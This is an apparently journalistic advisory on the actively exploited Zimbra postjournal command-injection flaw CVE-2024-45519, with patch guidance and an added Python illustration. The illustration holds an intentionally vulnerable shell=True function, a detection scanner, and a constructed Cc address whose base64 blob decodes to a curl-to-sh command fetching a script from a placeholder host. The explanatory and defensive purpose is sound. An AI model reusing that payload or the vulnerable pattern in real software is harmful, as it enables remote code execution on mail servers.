Cybersecurity researchers have identified ongoing exploitation attempts targeting a critical vulnerability in Zimbra mail servers [6], tracked as CVE-2024-45519 [2] [3] [6].
Description
The flaw is an OS command injection in Zimbra's postjournal service [5]: the service built a shell command from an unsanitized recipient address supplied over SMTP, so an unauthenticated remote attacker can execute arbitrary commands on the mail server. In the attacks seen so far the payload arrives in the addresses of an ordinary inbound email. The CC field carries a base64-encoded string that the server decodes and pipes to a shell, and the decoded command drops a webshell on the vulnerable installation. Once in place, the webshell accepts further commands or downloads and runs files over a socket connection [4], giving the attacker persistent access to the host.
Zimbra fixed the issue in 8.8.15 Patch 46, 9.0.0 Patch 41, 10.0.9 and 10.1.1 [1] [6] [8]; the patch adds input sanitization to postjournal so that a recipient address can no longer reach a shell [7]. The bug was discovered and reported by security researcher lebr0nli (Alan Li) [7]. Researchers have since demonstrated exploitability with crafted SMTP commands, so applying the patch should be treated as urgent; administrators who cannot patch immediately should disable the postjournal service. Administrators should also verify that Postfix's mynetworks parameter is configured correctly, since a misconfiguration can expose the postjournal listener to untrusted hosts, and should apply the patch even if the postjournal feature is not enabled on their Zimbra systems [5].
Proofpoint researchers have observed ongoing attacks in which spoofed emails carrying the malicious code are sent to vulnerable servers [3]. Patched versions are not affected [3], but unpatched installations remain exposed and administrators are urged to update promptly [3].
The observed attacks use emails spoofed to appear to come from Gmail [6], with the malicious addresses placed in the CC field [6], so that the server executes the embedded commands on the affected installation [1] [4] [6] [7]. The fix shipped in the Zimbra updates released on September 4, 2024 [1] [6]. Security experts recommend applying those patches [6]; where that is not immediately feasible, temporarily removing the postjournal binary takes the vulnerable service out of the mail path [6]. Because the flaw allows arbitrary command injection [5] [6] [7], patching should be paired with broader controls [6]: Kudelski Security lists network segmentation, regular patching, monitoring, user training, and backup and recovery [8], while noting that it had not itself observed active exploitation of the vulnerability [8].
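To make the mechanism and the detection angle concrete, the following is an added example, not code from Zimbra or from any of the cited sources. Postjournal is a C daemon; this Python stands in for it. It puts the vulnerable pattern (a recipient address spliced into a string that `sh -c` interprets) next to the hardened pattern (allowlist validation, then argv with no shell), and adds a header-level check that flags To/Cc/Bcc addresses of the kind reported in the campaign and decodes the base64 blob they carry. The `echo lookup` command, the domains, the documentation address 203.0.113.5 and the sample message are all constructed for the demo.

```python
"""Added illustration of the CVE-2024-45519 bug class plus a header check.

Not Zimbra's code: postjournal is a C daemon and this Python stands in for it.
Every address, domain and message below is constructed for the demo.
"""
from __future__ import annotations

import base64
import re
import subprocess
from email import message_from_string
from email.utils import getaddresses

# Shell-safe allowlist for the local part.  Deliberately stricter than RFC 5321
# atext, which itself permits `$`, backtick and `|`: an address can be RFC-valid
# and still be a command injection, so "is this a valid email" is the wrong check.
SAFE_LOCAL = re.compile(r"^[A-Za-z0-9._+=-]{1,64}$")
SAFE_DOMAIN = re.compile(r"^[A-Za-z0-9.-]{1,253}$")

# Anything a POSIX shell would interpret if it appeared inside a local part.
SHELL_META = re.compile(r"""[$`|;&<>(){}\\"'\s]""")
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
SHELL_WORDS = re.compile(r"\b(sh|bash|curl|wget|echo|base64|chmod)\b")


def run_vulnerable(recipient: str) -> str:
    """Vulnerable pattern: the recipient is spliced into a command string that
    `sh -c` interprets, so $(...) inside a quoted local part runs as a command.
    `echo lookup` is a harmless stand-in for the real lookup tool."""
    cmd = f"echo lookup {recipient}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def validate_recipient(recipient: str) -> str:
    """Reject anything outside the allowlist before it goes near a shell."""
    local, sep, domain = recipient.rpartition("@")
    if not sep or not SAFE_LOCAL.match(local) or not SAFE_DOMAIN.match(domain):
        raise ValueError(f"rejected recipient: {recipient!r}")
    return recipient


def run_hardened(recipient: str) -> str:
    """Fixed pattern: validated input passed as its own argv element, no shell."""
    argv = ["echo", "lookup", validate_recipient(recipient)]
    return subprocess.run(argv, capture_output=True, text=True, check=True).stdout


def decode_shell_payloads(text: str) -> list[str]:
    """Decode base64-looking tokens in `text` and keep those that read like shell."""
    found = []
    for tok in B64_TOKEN.findall(text):
        try:
            padded = tok + "=" * (-len(tok) % 4)
            decoded = base64.b64decode(padded, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue
        if SHELL_WORDS.search(decoded):
            found.append(decoded)
    return found


def scan_message(raw: str) -> list[dict]:
    """Flag To/Cc/Bcc addresses whose local part carries shell metacharacters,
    returning any embedded payload already decoded."""
    msg = message_from_string(raw)
    findings = []
    for header in ("To", "Cc", "Bcc"):
        for _name, addr in getaddresses(msg.get_all(header, [])):
            local = addr.rpartition("@")[0]
            if addr and SHELL_META.search(local):
                findings.append({"header": header, "address": addr,
                                 "decoded": decode_shell_payloads(addr)})
    return findings


# Constructed sample modelled on the reported campaign: a spoofed Gmail sender
# and a Cc whose quoted local part decodes a blob and pipes it to sh.  The blob
# is built here so the decoded command stays visible; 203.0.113.5 is a
# documentation address, not a real host.
_BLOB = base64.b64encode(b"curl -s http://203.0.113.5/x.sh|sh").decode()
SAMPLE_MESSAGE = (
    "From: someone@gmail.com\n"
    "To: alice@victim.example\n"
    f'Cc: "x$(echo {_BLOB}|base64 -d|sh)"@victim.example\n'
    "Subject: hello\n"
    "\n"
    "body\n"
)

if __name__ == "__main__":
    harmless = '"x$(echo INJECTED)"@victim.example'
    print("vulnerable:", run_vulnerable(harmless).strip())  # the subshell ran
    try:
        run_hardened(harmless)
    except ValueError as exc:
        print("hardened:", exc)
    for hit in scan_message(SAMPLE_MESSAGE):
        print("flagged", hit["header"], hit["address"], "->", hit["decoded"])
```

Running the script shows `lookup xINJECTED@victim.example` from the vulnerable path (the `$(...)` was expanded by the shell), a rejection from the hardened path, and a single finding for the Cc header with the decoded `curl ... | sh` command. The same `scan_message` logic can be pointed at quarantined messages or MTA logs that record recipient addresses; the allowlist is intentionally narrow because the goal is shell safety, not RFC completeness.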
Conclusion
The ongoing exploitation attempts targeting the vulnerability in Zimbra mail servers highlight the importance of timely patch application and comprehensive security measures to protect against potential security breaches. System administrators are urged to apply the latest patches promptly to prevent exploitation and safeguard their systems against active threats.
References
[1] https://thehackernews.com/2024/10/researchers-sound-alarm-on-active.html
[2] https://arstechnica.com/security/2024/10/attackers-exploit-critical-vulnerability-recently-patched-in-zimbra-servers/
[3] https://www.darkreading.com/cyberattacks-data-breaches/recent-zimbra-rce-under-attack-patch-now
[4] https://securityaffairs.com/169239/hacking/zimbra-postjournal-flaw-cve-2024-45519-exploited.html
[5] https://www.helpnetsecurity.com/2024/10/02/cve-2024-45519-exploited/
[6] https://cybermaterial.com/exploitation-targets-zimbra-postjournal-flaw/
[7] https://cybersecuritynews.com/zimbra-rce-vulnerability/
[8] https://research.kudelskisecurity.com/2024/10/02/security-advisory-cve-2024-45519/